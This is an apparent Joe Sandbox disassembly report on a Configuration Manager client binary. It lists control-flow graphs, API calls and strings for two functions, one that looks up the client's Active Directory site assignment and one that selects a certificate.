                                                                                            • Part of subcall function 00640801: GetCurrentThreadId.KERNEL32 ref: 00640858
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00642D12
                                                                                            • Part of subcall function 0064A27E: __EH_prolog3_catch_GS.LIBCMT ref: 0064A285
                                                                                            • Part of subcall function 0064A27E: GetCurrentThreadId.KERNEL32 ref: 0064A314
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00642C68
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00642E24
                                                                                          Strings
                                                                                          • GetStringFromColumn(&col, sSMSAssignedSite), xrefs: 00642C5E
                                                                                          • ..\lsad.cpp, xrefs: 00642B1B
                                                                                          • ..\lsad.cpp, xrefs: 00642C00
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00642E1F
                                                                                          • ..\lsad.cpp, xrefs: 006426CE
                                                                                          • sSMSAssignedSite.length(), xrefs: 00642E1A
                                                                                          • ..\lsad.cpp, xrefs: 00642E30
                                                                                          • GetStringFromColumn(&col, sSiteCode), xrefs: 0064282D
                                                                                          • This client might be within the boundaries of more than one site - AD SiteCode search matched %d entries, xrefs: 00642D99
                                                                                          • ..\lsad.cpp, xrefs: 006425FB
                                                                                          • ..\lsad.cpp, xrefs: 00642827
                                                                                          • vecBoundaries.size() > 0, xrefs: 006425A1
                                                                                          • ..\lsad.cpp, xrefs: 00642D1E
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00642BBA
                                                                                          • ..\lsad.cpp, xrefs: 00642C1C
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0064297C
                                                                                          • ..\lsad.cpp, xrefs: 006428AD
                                                                                          • ..\lsad.cpp, xrefs: 00642ACE
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00642832
                                                                                          • Attempting to query AD for assigned site code, xrefs: 0064266F
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006426D9
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006429F1
                                                                                          • ..\lsad.cpp, xrefs: 00642467
                                                                                          • Failed to get AD site name, xrefs: 00642527
                                                                                          • ..\lsad.cpp, xrefs: 00642731
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0064273C
                                                                                          • hr != ((HRESULT)0x00005012L), xrefs: 00642B05
                                                                                          • LSGetSubnetBoundaries(vecBoundaries), xrefs: 00642455
                                                                                          • ..\lsad.cpp, xrefs: 006427D4
                                                                                          • ..\lsad.cpp, xrefs: 00642BC7
                                                                                          • ..\lsad.cpp, xrefs: 006426E6
                                                                                          • Failed to get assigned site code from AD. Error 0x%x, xrefs: 00642D4B
                                                                                          • ..\lsad.cpp, xrefs: 006428F2
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00642C0B
                                                                                          • ..\lsad.cpp, xrefs: 00642AFF
                                                                                          • LSPerformADQuery( spCont, spSearch, hSearch, pszSiteObjectAttr, dwSiteObjectAttrCount, sSubnetSearchFilter ), xrefs: 00642A5E
                                                                                          • ..\lsad.cpp, xrefs: 00642D02
                                                                                          • ..\lsad.cpp, xrefs: 006424FF
                                                                                          • spSearch->GetColumn(hSearch, c_smsSMSSiteCode, &col), xrefs: 006427C2
                                                                                          • ..\lsad.cpp, xrefs: 006427BC
                                                                                          • LSGetADSiteName(sADSite), xrefs: 006424ED
                                                                                          • ..\lsad.cpp, xrefs: 0064259B
                                                                                          • ..\lsad.cpp, xrefs: 006425B7
                                                                                          • LSGetAssignedSiteFromAD, xrefs: 0064240B
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006427C7
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00642606
                                                                                          • hr = spSearch->GetNextRow(hSearch), xrefs: 006428B3
                                                                                          • ..\lsad.cpp, xrefs: 00642AB2
                                                                                          • msSMSSiteCode, xrefs: 006422EB, 0064268E, 00642788
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006428B8
                                                                                          • LSGetAssignedSiteFromAD : Trying to Assign to the Site <%s>, xrefs: 00642E70
                                                                                          • ..\lsad.cpp, xrefs: 00642A58
                                                                                          • LSPerformADQuery( spCont, spSearch, hSearch, pszRoamingBdryAttr, dwRoamingBdryAttrCount, sRangeSearchFilter ), xrefs: 006426D4
                                                                                          • ..\lsad.cpp, xrefs: 00642E14
                                                                                          • spSearch->GetColumn(hSearch, L"mSSMSAssignmentSiteCode", &col), xrefs: 00642BB5
                                                                                          • ..\lsad.cpp, xrefs: 0064283F
                                                                                          • CCM::LocationServices::LSGetAssignedSiteFromAD, xrefs: 0064237E
                                                                                          • LSBuildSiteCodeSearchFilter(vecBoundaries, sSiteCodeVector, sSubnetSearchFilter), xrefs: 00642977
                                                                                          • ..\lsad.cpp, xrefs: 00642C58
                                                                                          • ..\lsad.cpp, xrefs: 00642989
                                                                                          • ..\lsad.cpp, xrefs: 00642971
                                                                                          • The client will be assigned to the first valid site, xrefs: 00642DD6
                                                                                          • hr = spSearch->GetFirstRow(hSearch), xrefs: 00642737
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00642D0D
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006428FD
                                                                                          • ..\lsad.cpp, xrefs: 00642A02
                                                                                          • ..\lsad.cpp, xrefs: 00642BAF
                                                                                          • ..\lsad.cpp, xrefs: 006424E7
                                                                                          • ..\lsad.cpp, xrefs: 0064274D
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006424F2
                                                                                          • col.dwNumValues >= 1, xrefs: 00642C06
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0064245A
                                                                                          • ..\lsad.cpp, xrefs: 006428C9
                                                                                          • ..\lsad.cpp, xrefs: 00642C70
                                                                                          • LSBuildRangeSiteCodeSearchFilter(vecBoundaries, sRangeSearchFilter), xrefs: 00642601
                                                                                          • mSSMSAssignmentSiteCode, xrefs: 00642B7B
                                                                                          • Failed to build site code search filter, xrefs: 0064263B
                                                                                          • ..\lsad.cpp, xrefs: 00642613
                                                                                          • ..\lsad.cpp, xrefs: 0064290E
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006425A6
                                                                                          • Failed to build site code search filter, xrefs: 006429B1
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00642A63
                                                                                          • sSubnetSearchFilter.length(), xrefs: 006429EC
                                                                                          • ..\lsad.cpp, xrefs: 00642A70
                                                                                          • ..\lsad.cpp, xrefs: 006429E6
                                                                                          • hr = spSearch->GetFirstRow(hSearch), xrefs: 00642AB8
                                                                                          • ..\lsad.cpp, xrefs: 0064244F
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00642C63
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00642ABD
                                                                                          • Failed to get subnet boundaries, xrefs: 0064248F
                                                                                          • distinguishedName, xrefs: 006422E0
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00642B0A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_catch_$H_prolog3H_prolog3_catch$TextUnicode
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$Attempting to query AD for assigned site code$CCM::LocationServices::LSGetAssignedSiteFromAD$Failed to build site code search filter$Failed to build site code search filter$Failed to get AD site name$Failed to get assigned site code from AD. Error 0x%x$Failed to get subnet boundaries$GetStringFromColumn(&col, sSMSAssignedSite)$GetStringFromColumn(&col, sSiteCode)$LSBuildRangeSiteCodeSearchFilter(vecBoundaries, sRangeSearchFilter)$LSBuildSiteCodeSearchFilter(vecBoundaries, sSiteCodeVector, sSubnetSearchFilter)$LSGetADSiteName(sADSite)$LSGetAssignedSiteFromAD$LSGetAssignedSiteFromAD : Trying to Assign to the Site <%s>$LSGetSubnetBoundaries(vecBoundaries)$LSPerformADQuery( spCont, spSearch, hSearch, pszRoamingBdryAttr, dwRoamingBdryAttrCount, sRangeSearchFilter )$LSPerformADQuery( spCont, spSearch, hSearch, pszSiteObjectAttr, dwSiteObjectAttrCount, sSubnetSearchFilter )$The client will be assigned to the first valid site$This client might be within the boundaries of more than one site - AD SiteCode search matched %d entries$col.dwNumValues >= 1$distinguishedName$hr != ((HRESULT)0x00005012L)$hr = spSearch->GetFirstRow(hSearch)$hr = spSearch->GetFirstRow(hSearch)$hr = spSearch->GetNextRow(hSearch)$mSSMSAssignmentSiteCode$msSMSSiteCode$sSMSAssignedSite.length()$sSubnetSearchFilter.length()$spSearch->GetColumn(hSearch, L"mSSMSAssignmentSiteCode", &col)$spSearch->GetColumn(hSearch, c_smsSMSSiteCode, &col)$vecBoundaries.size() > 0
                                                                                          • API String ID: 3257228284-3649645874
                                                                                          • Opcode ID: 015811d4ea6eb98493c75d291831648051a9e5bdf2f81f7871e77ce6dd8dc556
                                                                                          • Instruction ID: 5e3691c53d73fcc4631fcad22c664584ee4781aa1d8607951d770f6e0d7c4de2
                                                                                          • Opcode Fuzzy Hash: 015811d4ea6eb98493c75d291831648051a9e5bdf2f81f7871e77ce6dd8dc556
                                                                                          • Instruction Fuzzy Hash: 63629E71940229AADB20DB50CD59FEEBB79BF94B04F5440D9F608B7382CB784A85CF60
                                                                                          Function 00623034 Relevance: 177.5, APIs: 28, Strings: 73, Instructions: 722threadencryptionCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 272 623034-6230cb call 5d22f4 call 5f419f * 3 call 6743a3 283 623127-62312f 272->283 284 6230cd-6230de call 5f0b53 272->284 286 623131-623142 call 5f0b53 283->286 287 62316c-623189 call 5a0397 call 5a0179 283->287 293 6230e0-623101 GetCurrentThreadId 284->293 294 62310f-623117 284->294 286->294 295 623144-62316a GetCurrentThreadId 286->295 304 6231da-6231f5 call 5a0397 call 5a0179 287->304 305 62318b-6231a7 call 5a0c32 287->305 297 623106-62310c call 5f1811 293->297 298 623119 call 5f0dba 294->298 299 62311e-623122 294->299 295->297 297->294 298->299 303 623a6b-623a9e call 59ef10 * 3 call 5d2246 299->303 321 6231f7-623213 call 5a0c32 304->321 322 623235-623239 304->322 315 6231ab-6231d8 call 5f511f call 59ef10 305->315 316 6231a9 305->316 334 623257-623269 CertOpenStore 315->334 316->315 336 623217-623233 call 5f511f call 59ef10 321->336 337 623215 321->337 328 62323b 322->328 329 62323d-623241 call 5f511f 322->329 328->329 335 623246-623252 329->335 338 6232fa-623318 call 6240ce 334->338 339 62326f-623292 GetLastError call 5f0b53 334->339 335->334 336->335 337->336 347 62336a-623372 338->347 348 62331a-623324 call 5f0b53 338->348 349 623294-6232b8 GetCurrentThreadId call 5f1811 339->349 350 6232bb-6232f2 call 592624 339->350 355 623481-623485 347->355 356 623378-623384 347->356 362 623352-62335a 348->362 363 623326-62334f GetCurrentThreadId call 5f1811 348->363 349->350 350->338 358 62338a-623393 call 5f3b94 355->358 359 62348b-623494 call 5f3b94 355->359 356->358 371 6233c6-6233d1 358->371 372 623395-6233bf call 592624 358->372 374 623496-6234c6 call 592624 359->374 375 6234c7-6234cf 359->375 368 623361-623365 362->368 369 62335c call 5f0dba 362->369 363->362 377 623a49-623a57 368->377 369->368 379 6233d7-6233de call 5f3b94 371->379 380 6234d4-6234db call 5f3b94 371->380 384 6233c4-6233c5 372->384 374->375 375->362 381 623a59-623a5b CertCloseStore 377->381 382 623a5d-623a65 377->382 391 6233e0-6233ea 379->391 392 62341d-623443 call 628842 379->392 393 62351c-623522 380->393 394 6234dd-623514 call 592624 380->394 381->382 382->303 386 623a67-623a69 CertCloseStore 382->386 384->371 386->303 397 6233ee-62341a call 592624 391->397 398 6233ec 391->398 408 623823 392->408 409 623449-623453 call 5f0b53 392->409 396 623524-623534 CertEnumCertificatesInStore 393->396 400 623519 394->400 401 623536-62353d 396->401 402 62353f-623541 396->402 397->392 398->397 400->393 401->396 405 6235d2-6235da call 5f3b94 402->405 406 623547-62355b call 5f0b53 402->406 420 623617-623620 call 5f3b94 405->420 421 6235dc-623614 call 592624 405->421 422 623584-62358d call 5f3b94 406->422 423 62355d-623581 GetCurrentThreadId call 5f1811 406->423 412 623829-62382b 408->412 409->362 419 623459-623477 GetCurrentThreadId 409->419 416 623837-623848 call 6227c0 412->416 417 62382d 412->417 433 623882-623893 call 622b61 416->433 434 62384a-623854 call 5f0b53 416->434 417->416 419->355 437 623733-623735 420->437 438 623626-623628 420->438 421->420 422->362 440 623593-6235c5 call 592624 422->440 423->422 452 623895-62389f call 5f0b53 433->452 453 6238cd-6238d6 call 5f3b94 433->453 434->362 456 62385a-623878 GetCurrentThreadId 434->456 442 623772-623790 call 6284e6 437->442 443 623737-62376f call 592624 437->443 445 623657-623669 CertEnumCertificatesInStore 438->445 446 62362a-623656 call 592624 438->446 450 6235ca-6235cd 440->450 442->408 467 623796-62379e call 5f3b94 442->467 443->442 448 6236b7-6236cb call 6258c2 445->448 449 62366b-623689 GetLastError call 5f0b53 445->449 446->445 448->412 471 6236d1-6236da CertFreeCertificateContext 448->471 449->362 469 62368f-6236ad GetCurrentThreadId 449->469 450->362 452->362 470 6238a5-6238c3 GetCurrentThreadId 452->470 473 623916-623927 CertDuplicateCertificateContext 453->473 474 6238d8-623913 call 592624 453->474 456->433 485 6237a0-6237cc call 592624 467->485 486 6237cd-6237e9 call 6284e6 467->486 469->448 470->453 477 623728 471->477 478 6236dc-6236fa GetLastError call 5f0b53 471->478 475 623975-62397e CertFreeCertificateContext 473->475 476 623929-623947 GetLastError call 5f0b53 473->476 474->473 482 623980-62399e GetLastError call 5f0b53 475->482 483 6239cc-6239d4 475->483 476->362 497 62394d-62396b GetCurrentThreadId 476->497 477->437 478->362 499 623700-62371e GetCurrentThreadId 478->499 482->362 505 6239a4-6239c2 GetCurrentThreadId 482->505 492 623a13-623a1b 483->492 493 6239d6-6239e5 call 5f0b53 483->493 485->486 486->408 503 6237eb-6237f5 call 5f0b53 486->503 495 623a22-623a29 492->495 496 623a1d call 5f0dba 492->496 493->362 508 6239eb-623a09 GetCurrentThreadId 493->508 495->377 496->495 497->475 499->477 503->362 510 6237fb-623819 GetCurrentThreadId 503->510 505->483 508->492 510->408
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0062303E
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006230F5
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00623159
                                                                                          • CertOpenStore.CRYPT32(0000000A,00000000,00000000,0002C000,?), ref: 0062325B
                                                                                          • GetLastError.KERNEL32(?,0058B3CC,?,?,?,?,?,00938B28,00000001,00000000,00000000,?,00000001,00000000,00000000,?), ref: 0062326F
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006232A5
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0062333C
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0062346F
                                                                                          • CertEnumCertificatesInStore.CRYPT32(?,00000000), ref: 00623526
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0062356E
                                                                                          • CertEnumCertificatesInStore.CRYPT32(?,00000000), ref: 00623659
                                                                                          • GetLastError.KERNEL32(?,0058B3CC,?,?,?,?,?,00938B28,00000001,00000000,00000000,?,00000001,00000000,00000000,?), ref: 0062366B
                                                                                          • CertFreeCertificateContext.CRYPT32(00000000,00000000,?,?,00000000,?,0058B3CC,?,?,?,?,?,00938B28,00000001,00000000,00000000), ref: 006236D2
                                                                                          • GetLastError.KERNEL32(?,0058B3CC,?,?,?,?,?,00938B28,00000001,00000000,00000000,?,00000001,00000000,00000000,?), ref: 006236DC
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00623716
                                                                                            • Part of subcall function 006227C0: __EH_prolog3_catch.LIBCMT ref: 006227C7
                                                                                            • Part of subcall function 006227C0: GetCurrentThreadId.KERNEL32 ref: 00622815
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00623870
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006238BB
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006236A5
                                                                                            • Part of subcall function 00592624: GetCurrentThreadId.KERNEL32 ref: 00592630
                                                                                            • Part of subcall function 006258C2: __EH_prolog3_catch_GS.LIBCMT ref: 006258CC
                                                                                            • Part of subcall function 006258C2: GetCurrentThreadId.KERNEL32 ref: 0062595A
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00623811
                                                                                          • CertDuplicateCertificateContext.CRYPT32(?), ref: 00623917
                                                                                          • GetLastError.KERNEL32(?,0058B3CC,?,?,?,?,?,00938B28,00000001,00000000,00000000,?,00000001,00000000,00000000,?), ref: 00623929
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00623963
                                                                                          • CertFreeCertificateContext.CRYPT32(?,?,0058B3CC,?,?,?,?,?,00938B28,00000001,00000000,00000000,?,00000001,00000000,00000000), ref: 00623976
                                                                                          • GetLastError.KERNEL32(?,0058B3CC,?,?,?,?,?,00938B28,00000001,00000000,00000000,?,00000001,00000000,00000000,?), ref: 00623980
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006239BA
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00623A01
                                                                                          • CertCloseStore.CRYPT32(?,00000000), ref: 00623A5B
                                                                                          • CertCloseStore.CRYPT32(?,00000000), ref: 00623A69
                                                                                            • Part of subcall function 005A0C32: __EH_prolog3_GS.LIBCMT ref: 005A0C39
                                                                                          Strings
                                                                                          • CcmGetCertSubjectNameAny(pCurCertContext, sCertSubjectName), xrefs: 00623866
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006230F0
                                                                                          • %lu certificate(s) found in the '%s' certificate store., xrefs: 00623603
                                                                                          • ..\CcmCert.cpp, xrefs: 0062396B
                                                                                          • Certificate Selection Criteria, xrefs: 00623503
                                                                                          • NULL != hStore, xrefs: 0062329B
                                                                                          • Failed to open '%s' certificate store., xrefs: 006232E1
                                                                                          • 0 != ppCertContext, xrefs: 0062314F
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00623337
                                                                                          • 0 != pCurCertContext, xrefs: 0062369B
                                                                                          • Only one certificate present in the certificate store., xrefs: 00623644
                                                                                          • ..\CcmCert.cpp, xrefs: 00623165
                                                                                          • The '%s' was not specified, counting number of certificates present in '%s' store of 'Local Computer'., xrefs: 00623508
                                                                                          • CcmGetCertThumbprint(pCurCertContext, sCertThumbprint), xrefs: 006238B1
                                                                                          • ..\CcmCert.cpp, xrefs: 006230E5
                                                                                          • GetCertificateBySelectionCriteriaEx( hChainEngine, hFilteredStore, sCertSel, bCertFirstFlag, dwCertFlags, &pCurCertContext ), xrefs: 00623465
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0062346A
                                                                                          • 0 != *ppCertContext, xrefs: 006239F7
                                                                                          • The '%s' of 'Local Computer' store has %lu certificate(s). Using custom selection criteria based on the machine name., xrefs: 0062375E
                                                                                          • >>> Client selected the PKI Certificate [Thumbprint %s] issued to '%s', xrefs: 00623905
                                                                                          • ..\CcmCert.cpp, xrefs: 00623953
                                                                                          • ..\CcmCert.cpp, xrefs: 0062332C
                                                                                          • ,,|, xrefs: 006237A6
                                                                                          • ..\CcmCert.cpp, xrefs: 0062345F
                                                                                          • ..\CcmCert.cpp, xrefs: 00623344
                                                                                          • ::CertFreeCertificateContext( pCurCertContext ), xrefs: 0062370C
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0062395E
                                                                                          • ..\CcmCert.cpp, xrefs: 00623801
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006236A0
                                                                                          • ..\CcmCert.cpp, xrefs: 00623477
                                                                                          • ..\CcmCert.cpp, xrefs: 006238C3
                                                                                          • ..\CcmCert.cpp, xrefs: 006239AA
                                                                                          • ..\CcmCert.cpp, xrefs: 00623149
                                                                                          • ..\CcmCert.cpp, xrefs: 0062371E
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00623569
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006239FC
                                                                                          • ..\CcmCert.cpp, xrefs: 006239C2
                                                                                          • ..\CcmCert.cpp, xrefs: 006232AD
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00623154
                                                                                          • There are no certificates in the '%s' store., xrefs: 006235B9
                                                                                          • ..\CcmCert.cpp, xrefs: 00623878
                                                                                          • ..\CcmCert.cpp, xrefs: 0062355E
                                                                                          • 0 != dwCertCount, xrefs: 00623564
                                                                                          • User\, xrefs: 0062316E, 0062317B
                                                                                          • Machine\, xrefs: 006231DA, 006231E7
                                                                                          • ..\CcmCert.cpp, xrefs: 00623695
                                                                                          • `|, xrefs: 006234A0
                                                                                          • ::CertFreeCertificateContext(pCurCertContext), xrefs: 006239B0
                                                                                          • CcmGetFilteredCertificateStoreByIssuers(hStore, sCertIssuers, hFilteredStore, bFoundCerts), xrefs: 00623332
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00623711
                                                                                          • CcmUtilLib::CcmGetCertificateContextEx3, xrefs: 006230AA
                                                                                          • sCertStoreName.length() > 0, xrefs: 006230EB
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006232A0
                                                                                          • ..\CcmCert.cpp, xrefs: 00623576
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006239B5
                                                                                          • 0 != *ppCertContext, xrefs: 00623959
                                                                                          • ..\CcmCert.cpp, xrefs: 006239F1
                                                                                          • ..\CcmCert.cpp, xrefs: 006236AD
                                                                                          • Begin to select client certificate, xrefs: 006233B3
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0062386B
                                                                                          • Unable to find any Certificate based on Certificate Issuers, xrefs: 006234B4
                                                                                          • Using certificate selection criteria '%s'., xrefs: 00623409
                                                                                          • ..\CcmCert.cpp, xrefs: 00623101
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006238B6
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0062380C
                                                                                          • ..\CcmCert.cpp, xrefs: 00623860
                                                                                          • ..\CcmCert.cpp, xrefs: 006238AB
                                                                                          • (|, xrefs: 0062339F
                                                                                          • ..\CcmCert.cpp, xrefs: 00623295
                                                                                          • ..\CcmCert.cpp, xrefs: 00623A09
                                                                                          • ..\CcmCert.cpp, xrefs: 00623706
                                                                                          • Using custom selection criteria based on the machine NetBIOS name., xrefs: 006237BA
                                                                                          • ..\CcmCert.cpp, xrefs: 00623819
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$Cert$ErrorLastStore$CertificateContext$CertificatesCloseEnumFreeH_prolog3_catch_$DuplicateH_prolog3H_prolog3_H_prolog3_catchOpen
                                                                                          • String ID: %lu certificate(s) found in the '%s' certificate store.$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$(|$,,|$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$0 != *ppCertContext$0 != *ppCertContext$0 != dwCertCount$0 != pCurCertContext$0 != ppCertContext$::CertFreeCertificateContext( pCurCertContext )$::CertFreeCertificateContext(pCurCertContext)$>>> Client selected the PKI Certificate [Thumbprint %s] issued to '%s'$Begin to select client certificate$CcmGetCertSubjectNameAny(pCurCertContext, sCertSubjectName)$CcmGetCertThumbprint(pCurCertContext, sCertThumbprint)$CcmGetFilteredCertificateStoreByIssuers(hStore, sCertIssuers, hFilteredStore, bFoundCerts)$CcmUtilLib::CcmGetCertificateContextEx3$Certificate Selection Criteria$Failed to open '%s' certificate store.$GetCertificateBySelectionCriteriaEx( hChainEngine, hFilteredStore, sCertSel, bCertFirstFlag, dwCertFlags, &pCurCertContext )$Machine\$NULL != hStore$Only one certificate present in the certificate store.$The '%s' of 'Local Computer' store has %lu certificate(s). Using custom selection criteria based on the machine name.$The '%s' was not specified, counting number of certificates present in '%s' store of 'Local Computer'.$There are no certificates in the '%s' store.$Unable to find any Certificate based on Certificate Issuers$User\$Using certificate selection criteria '%s'.$Using custom selection criteria based on the machine NetBIOS name.$`|$sCertStoreName.length() > 0
                                                                                          • API String ID: 1321363422-1093223174
                                                                                          • Opcode ID: af3c9febd89d059bb8107e279d964180981bde495bb84f0af6c2c3a3f93964c7
                                                                                          • Instruction ID: 447a4290ca37335dc42f65b63c8beeb1dd83282c8c6273abbcb6a5a5be9717c5
                                                                                          • Opcode Fuzzy Hash: af3c9febd89d059bb8107e279d964180981bde495bb84f0af6c2c3a3f93964c7
